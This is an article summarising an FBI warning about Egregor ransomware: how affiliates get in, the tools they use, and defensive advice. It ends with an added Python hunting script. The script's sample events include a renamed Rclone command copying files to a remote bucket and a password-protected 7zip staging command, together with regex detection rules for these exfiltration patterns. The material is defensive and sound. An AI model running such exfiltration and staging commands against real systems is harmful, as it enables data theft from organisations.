The Federal Bureau of Investigation (FBI) has published a Private Industry Notification warning of the growing number of Egregor ransomware attacks.
Egregor is a ransomware-as-a-service (RaaS) operation first observed in September 2020. The operators recruit affiliates to break into networks and deploy the ransomware, and those affiliates receive a share of each ransom that is paid. The affiliates have been very active over the past three months and have hit many large organizations. Known victims include Ubisoft, Barnes & Noble, Crytek, Kmart, and TransLink, a Canadian public transportation agency.
The threat group claims to have compromised more than 150 companies and deployed Egregor on their systems, and victims have paid more than $4 million in ransoms. Because the group has many affiliates and each one uses its own tactics, techniques, and procedures (TTPs) to gain access and deploy the ransomware, there is no single intrusion pattern for network defenders to block, which makes the campaign harder to defend against.
Initial access is usually gained through phishing emails sent to corporate email accounts; opening a malicious attachment triggers the download of the ransomware payload. Other observed entry points are brute-force attacks against weak passwords and exploitation of vulnerabilities in Virtual Private Network (VPN) appliances and Remote Desktop Protocol (RDP) services.
Once inside, the attackers escalate privileges and move laterally using tools such as AdFind, Cobalt Strike, Advanced IP Scanner, and malware such as QakBot. They search the network for sensitive files, which are archived with 7zip and exfiltrated with Rclone, sometimes disguising the tool as the Windows Service Host process (svchost). The stolen data is then used to pressure the victim into paying: if no payment is made, the threat actors sell or publish it.
Egregor first appeared at roughly the time the Maze ransomware operation shut down, and Maze affiliates moved over to distributing Egregor. Several security researchers believe the Maze gang is behind Egregor, citing the timing, overlaps in the types of companies targeted, and similarities in the ransom demands. The operators also appear to be experienced at running a ransomware-as-a-service program.
The FBI advises against paying the ransom: there is no guarantee that working decryption keys will be provided or that the stolen files will be deleted, and every payment finances future attacks and encourages the threat actors to keep operating.
Because the affiliates use such varied techniques to gain access, network defenders need to tighten security across the whole organization rather than against one delivery method. To ensure data can be recovered after an attack, critical data must be backed up regularly, and the backups must be kept offline, on an external drive or in cloud storage that is not connected to the corporate network.
Antivirus and anti-malware software with automatic updates should be deployed on all endpoints, and an email security gateway should be used to block phishing messages. Multi-factor authentication should be enforced on all corporate email and remote access accounts; it complements, rather than replaces, a strong password policy, so both are required.
Remote access should only be used over trusted networks, never over public Wi-Fi. Public-facing remote access services must be kept up to date and patched as soon as fixes are released: several intrusions began with exploitation of RDP and Remote Desktop Gateway vulnerabilities such as CVE-2020-0609, CVE-2020-0610, CVE-2020-16896, CVE-2019-1489, CVE-2019-1224, CVE-2019-1225, and CVE-2019-1108, so patching these is a priority. The FBI also recommends reviewing suspicious .bat and .dll files and reconnaissance artifacts such as .log files, and monitoring for the use of data exfiltration tools.
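The hunting guidance above (exfiltration tools renamed to svchost, 7zip staging of stolen data, suspicious .bat and .dll files) can be turned into a few concrete checks over process-creation telemetry. The script below is an added example written for this article, not code from the FBI notification; the event records are constructed samples in a simplified Sysmon/4688-style shape (image path, command line, parent image), and the rule names and thresholds are my own assumptions, not published indicators.

```python
"""Hunt for Egregor-style exfiltration tradecraft in process-creation events.

Added example for this article (not from the FBI notification). Events are
constructed samples; field names and rule names are assumptions.
"""
import ntpath  # Windows path handling regardless of the host OS
import re

# Where a genuine svchost.exe lives (assumption: default Windows install paths)
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
# Directories a low-privileged user or dropper can write to
USER_WRITABLE = (r"\users\public", r"\appdata\local\temp", r"\programdata", r"\windows\temp")

# Rclone's argument grammar survives renaming the binary: <cmd> copy|sync|move <src> <remote>:<path>
RCLONE_SYNTAX = re.compile(r"\b(copy|sync|move|copyto|moveto)\b.*\b[a-z0-9_-]+:(/|[a-z0-9_-])", re.I)
RCLONE_FLAGS = re.compile(r"--(transfers|config|bwlimit|no-check-certificate|ignore-existing)\b", re.I)
# Any drive-letter path ending in .bat or .dll inside a command line
SCRIPT_OR_DLL = re.compile(r"""[A-Za-z]:\\[^\s"']+\.(bat|dll)\b""", re.I)

# Constructed sample events: one benign svchost, one renamed Rclone, one 7zip staging
# run, one .bat from Users\Public, one DLL loaded from Temp, one benign 7-Zip GUI launch
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs",
     "parent": r"C:\Windows\System32\services.exe"},
    {"image": r"C:\Users\Public\svchost.exe",
     "cmdline": r'svchost.exe copy "C:\Finance" remote:bucket/finance --transfers 32',
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\ProgramData\7z.exe",
     "cmdline": r"7z.exe a -pSecret123 -mhe=on C:\Temp\out.7z C:\Shares\HR",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\System32\cmd.exe", "cmdline": r"cmd.exe /c C:\Users\Public\run.bat",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\alice\AppData\Local\Temp\q.dll,DllRegisterServer",
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Program Files\7-Zip\7zG.exe", "cmdline": r'"C:\Program Files\7-Zip\7zG.exe"',
     "parent": r"C:\Windows\explorer.exe"},
]


def in_user_writable(path: str) -> bool:
    p = path.lower()
    return any(marker in p for marker in USER_WRITABLE)


def check_event(ev: dict) -> list:
    """Return the list of rule names that fire for one process-creation event."""
    hits = []
    image, cmd, parent = ev["image"], ev["cmdline"], ev["parent"]
    name = ntpath.basename(image).lower()

    # Masquerading: svchost.exe outside the system directories or not spawned by services.exe
    if name == "svchost.exe":
        if ntpath.dirname(image).lower() not in SYSTEM_DIRS:
            hits.append("svchost_outside_system32")
        if ntpath.basename(parent).lower() != "services.exe":
            hits.append("svchost_unexpected_parent")

    # Rclone usage, detected from the command line so a renamed binary is still caught
    if RCLONE_SYNTAX.search(cmd) or RCLONE_FLAGS.search(cmd):
        hits.append("rclone_syntax")

    # 7zip creating a password-protected archive ("a" = add, -p<pass>), typical of staging
    if name in ("7z.exe", "7za.exe", "7zg.exe"):
        tokens = cmd.split()
        if "a" in tokens and any(t.startswith("-p") for t in tokens):
            hits.append("7zip_encrypted_archive")

    # .bat or .dll referenced from a user-writable location (dropper scripts, sideloaded DLLs)
    if any(in_user_writable(m.group(0)) for m in SCRIPT_OR_DLL.finditer(cmd)):
        hits.append("script_or_dll_from_user_writable_dir")

    return hits


def scan(events: list) -> dict:
    """Map event index -> list of rule hits, for every event that fired at least one rule."""
    findings = {}
    for idx, ev in enumerate(events):
        hits = check_event(ev)
        if hits:
            findings[idx] = hits
    return findings


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        ev = SAMPLE_EVENTS[idx]
        print(f"[event {idx}] {', '.join(hits)}: {ev['image']} :: {ev['cmdline']}")
```

Feeding real Sysmon Event ID 1 or Security 4688 records into `check_event` needs only a field mapping; the point of the Rclone rule is that it keys on argument syntax and flags rather than the file name, since the affiliates are known to rename the binary. The svchost parent check assumes the standard `services.exe` parent and should be tuned against your own baseline before alerting on it.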
Victims of Egregor attacks should report them to their local FBI field office or to the FBI's 24/7 CyWatch. Victims should also keep in mind that paying a ransom can carry sanctions risk: in 2020 the Treasury Department's Office of Foreign Assets Control (OFAC) warned that a ransom payment may violate OFAC regulations if it has a sanctions nexus. Organizations considering payment should therefore contact OFAC first to avoid potential sanctions exposure.